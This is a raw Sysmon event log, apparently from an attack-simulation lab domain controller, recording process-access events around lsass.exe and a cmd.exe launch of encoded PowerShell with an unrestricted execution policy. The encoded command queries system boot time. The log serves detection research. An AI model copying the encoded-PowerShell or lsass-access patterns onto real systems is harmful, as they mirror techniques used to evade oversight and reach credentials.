08:40:27.696{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000478Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.696{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000477Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.696{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000476Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.696{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000475Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.509{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-167B-5F84-1103-000000007E01}4744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000474Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.509{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-167B-5F84-1103-000000007E01}4744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x8000000000000000473Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.477{5D479F2C-167B-5F84-1103-000000007E01}4744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ie45nprh.hh4.ps12020-10-12 08:40:27.477 10341000x8000000000000000472Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.462{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-167B-5F84-1103-000000007E01}4744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000471Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.446{5D479F2C-167B-5F84-0F03-000000007E01}44684280C:\Windows\system32\conhost.exe{5D479F2C-167B-5F84-1103-000000007E01}4744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000470Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.446{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000469Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.446{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000468Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.446{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000467Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.446{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000466Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.446{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000465Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.446{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000464Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.446{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000463Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.446{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000462Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.446{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000461Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.446{5D479F2C-14FE-5F84-0500-000000007E01}6402464C:\Windows\system32\csrss.exe{5D479F2C-167B-5F84-1103-000000007E01}4744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000460Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.446{5D479F2C-167B-5F84-1003-000000007E01}43962676C:\Windows\system32\cmd.exe{5D479F2C-167B-5F84-1103-000000007E01}4744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000459Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.450{5D479F2C-167B-5F84-1103-000000007E01}4744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-167B-5F84-41E1-110000000000}0x11e1410HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5D479F2C-167B-5F84-1003-000000007E01}4396C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 10341000x8000000000000000458Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.446{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000457Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.446{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000456Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.446{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000455Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.446{5D479F2C-167B-5F84-0F03-000000007E01}44684280C:\Windows\system32\conhost.exe{5D479F2C-167B-5F84-1003-000000007E01}4396C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000454Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.446{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 